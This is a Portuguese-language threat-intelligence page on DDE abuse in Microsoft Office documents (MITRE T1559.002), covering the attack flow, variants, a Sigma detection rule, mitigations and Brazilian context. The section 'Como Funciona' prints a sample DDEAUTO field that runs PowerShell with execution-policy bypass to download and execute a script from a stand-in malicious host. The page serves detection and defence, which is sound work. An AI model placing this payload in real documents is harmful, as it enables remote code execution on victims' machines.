# T1559.002 - Inter-Process Commúnication: Dynamic Data Exchange
> [!danger] Execução via DDE em documentos Office
> Adversarios abusam do protocolo Dynamic Data Exchange (DDE) em documentos Microsoft Office para executar comandos arbitrarios no sistema da vitima sem necessidade de macros VBA, contornando controles de segurança tradicionais.
## Visão Geral
**Dynamic Data Exchange (DDE)** e um protocolo legado da Microsoft que permite a comunicação inter-processo e troca de dados entre aplicações Windows. Adversarios exploram campos DDE em documentos Word, Excel e Outlook para executar comandos arbitrarios quando a vitima abre o documento e aceita os prompts de atualização de campo. Diferente de macros VBA, DDE não requer habilitacao explicita pelo usuario alem de aceitar dialogos aparentemente inofensivos.
A técnica [[t1559-002-dynamic-data-exchange|T1559.002]] foi amplamente utilizada por grupos como [[g0007-apt28|APT28]], [[g0069-mango-sandstorm|MuddyWater]] e [[ta505|TA505]] em campanhas de [[t1566-001-spearphishing-attachment|spear-phishing]]. O grupo [[g0007-apt28|APT28]] (Fancy Bear) utilizou documentos com DDE em ataques contra organizacoes governamentais e militares europeias, enquanto [[g0069-mango-sandstorm|MuddyWater]] empregou a técnica extensivamente em campanhas contra alvos no Oriente Medio e, ocasionalmente, na América Latina.
O DDE apresenta vantagens operacionais significativas para o atacante: não depende de macros (que sao frequentemente bloqueadas por politicas corporativas), funciona em documentos Word e Excel sem necessidade de conteudo ativo habilitado, e os alertas apresentados ao usuario sao genericos o suficiente para serem ignorados. A Microsoft desabilitou DDE por padrao no Word a partir de dezembro de 2017 (patch KB4011574), mas muitas organizacoes ainda executam versoes antigas ou não aplicaram o patch.
No Brasil, ataques baseados em documentos Office continuam sendo um vetor primario de comprometimento, especialmente em campanhas direcionadas a setores [[financial|financeiro]] e [[government|governamental]], onde o uso de documentos Word e Excel e onipresente nas operações diarias.
## Attack Flow
```mermaid
graph TB
A["📧 Delivery<br/>Spear-phishing com documento Office"]
B["📄 User Interaction<br/>Vitima abre documento e aceita prompt DDE"]
C["🔴 Execution<br/>DDE invoca cmd.exe ou PowerShell"]
D["⬇️ Download<br/>Payload de segundo estagio baixado"]
E["🔗 C2<br/>Conexão com servidor de comando"]
F["🕵️ Actions<br/>Reconhecimento e movimentação lateral"]
A --> B --> C --> D --> E --> F
classDef neutral fill:#3498db,stroke:#2980b9,color:#ecf0f1
classDef current fill:#e74c3c,stroke:#c0392b,color:#ecf0f1,stroke-width:3px
class A,B neutral
class C current
class D,E,F neutral
```
**Legenda:** [[t1566-001-spearphishing-attachment|T1566.001]] (Delivery) - **T1559.002 (Execution)** - [[t1105-ingress-tool-transfer|T1105]] (Download) - [[t1071-application-layer-protocol|T1071]] (C2)
## Como Funciona
### Mecanismo DDE em Word
O atacante insere um campo DDE no documento Word que referência uma aplicação externa. Quando a vitima abre o documento, o Office pergunta se deseja atualizar os campos vinculados. Se aceitar, o comando e executado.
Exemplo de payload DDE em um campo Word:
```
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://malicious[.]com/payload.ps1')"}
```
### Fluxo de execução
1. Vitima recebe e-mail com documento Office anexo
2. Ao abrir, Word/Excel exibe prompt generico de atualização de links
3. Usuario aceita o prompt (habito comum em ambientes corporativos)
4. Campo DDE invoca `cmd.exe` ou `powershell.exe`
5. Script de segundo estagio e baixado e executado
6. Backdoor ou RAT e instalado
### Variantes
| Variante | Aplicação | Detalhes |
|----------|-----------|----------|
| DDEAUTO | Word | Execução automatica ao abrir |
| DDE em celula | Excel | Formula que invoca processo externo |
| DDE em Outlook | Outlook | Execução via preview de e-mail |
| OLE + DDE | Word/Excel | Combinacao com objetos OLE |
## Detecção
| Fonte de dados | Método | Eficacia |
|----------------|--------|----------|
| [[ds0009-process\|Process Creation]] | Processos filhos de WINWORD.exe, EXCEL.exe executando cmd/powershell | Alta |
| [[ds0012-script\|Script Execution]] | Monitorar execução de PowerShell originada de processos Office | Alta |
| [[ds0022-file\|File Creation]] | Arquivos criados por processos Office em locais incomuns | Media |
| [[ds0017-command\|Command Execution]] | Linhas de comando suspeitas com encodings base64 via Office | Alta |
| Análise de documentos | Inspecionar campos DDE em documentos antes de abrir | Media |
### Regra Sigma
```yaml
title: DDE Execution - Office Application Spawning Suspicious Process
id: runk-t1559002-dde
status: experimental
description: Detecta execução de DDE quando aplicações Office iniciam processos suspeitos
references:
- https://attack.mitre.org/techniques/T1559/002/
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith:
- '\WINWORD.EXE'
- '\EXCEL.EXE'
- '\OUTLOOK.EXE'
- '\POWERPNT.EXE'
selection_child:
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\mshta.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\certutil.exe'
- '\regsvr32.exe'
condition: selection_parent and selection_child
falsepositives:
- Macros VBA legitimas que invocam processos do sistema
- Add-ins Office com funcionalidade de sistema
level: high
tags:
- attack.execution
- attack.t1559.002
```
## Mitigação
- **Desabilitar DDE no Word** - aplicar registry key `EnableLinkedConnections = 0` e patch KB4011574 em todos os endpoints
- **Desabilitar atualização automatica de links** - configurar Group Policy para impedir atualização automatica de campos DDE
- **Regras ASR (Attack Surface Reduction)** - habilitar regra ASR do Microsoft Defender que bloqueia processos filhos de aplicações Office
- **Treinamento de usuarios** - educar sobre riscos de aceitar prompts de atualização de campos em documentos
- **Gateway de e-mail** - inspecionar anexos Office em busca de campos DDE antes da entrega
- **Application Control** - restringir execução de `cmd.exe` e `powershell.exe` como filhos de processos Office via AppLocker ou WDAC
Mitigacoes MITRE relacionadas: [[m1040-behavior-prevention-on-endpoint\|M1040]] - [[m1042-disable-or-remove-feature-or-program\|M1042]]
## Relevância LATAM/Brasil
> [!latam] Contexto Regional
> O uso extensivo de documentos Office no setor corporativo brasileiro torna DDE um vetor de ataque particularmente eficaz na regiao.
Fatores que amplificam o risco no Brasil e América Latina:
- **Dependência de Office** - o ecossistema corporativo brasileiro e fortemente dependente de Microsoft Office, com grande volume de documentos trocados diariamente por e-mail
- **Patch gap** - muitas organizacoes de medio porte no Brasil ainda não aplicaram o patch que desabilita DDE por padrao, especialmente em versoes Office 2013 e 2016
- **Banking trojans** - campanhas de malware bancario brasileiro (Grandoreiro, Guildma) historicamente utilizaram documentos Office como vetor inicial, incluindo variantes com DDE
- **Setor público vulnerável** - orgaos governamentais frequentemente operam com versoes desatualizadas do Office, sem politicas ASR configuradas
- **Phishing em portugues** - campanhas de DDE direcionadas ao Brasil utilizam temas como notas fiscais eletronicas (NFe), boletos e comúnicados da Receita Federal
## Referências
- [MITRE ATT&CK - T1559.002](https://attack.mitre.org/techniques/T1559/002/)
- [Microsoft - Disabling DDE Feature in Office](https://docs.microsoft.com/en-us/security-updates/)
- [SensePost - DDE Payloads in Office Documents](https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/)
- [SANS ISC - DDE Attack Analysis](https://isc.sans.edu/)